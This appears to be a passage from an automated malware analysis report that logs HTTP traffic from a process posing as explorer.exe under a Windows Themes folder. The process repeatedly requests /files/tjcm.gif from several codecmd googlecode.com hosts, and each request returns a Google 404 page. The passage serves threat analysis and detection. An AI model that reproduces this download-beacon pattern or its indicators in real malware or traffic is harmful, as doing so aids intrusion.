                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:02.123795986 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      59192.168.2.549773108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:02.713845968 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:03.413997889 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:03 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:03.414016962 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      60192.168.2.54977474.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:03.736788988 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:04.450691938 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:04 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:04.450714111 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      61192.168.2.549775108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:05.976877928 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:06.958806038 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:06 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:06.958822966 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                      Sep 30, 2024 16:15:06.958924055 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                      Sep 30, 2024 16:15:06.959127903 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:06 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:06.963871956 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      62192.168.2.549776108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:07.464694977 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:08.192722082 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:08 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:08.192761898 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      63192.168.2.54977774.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:08.644365072 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:09.340559006 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:09 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:09.341017008 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      64192.168.2.549778108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:10.268399000 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:10.989727974 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:10 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
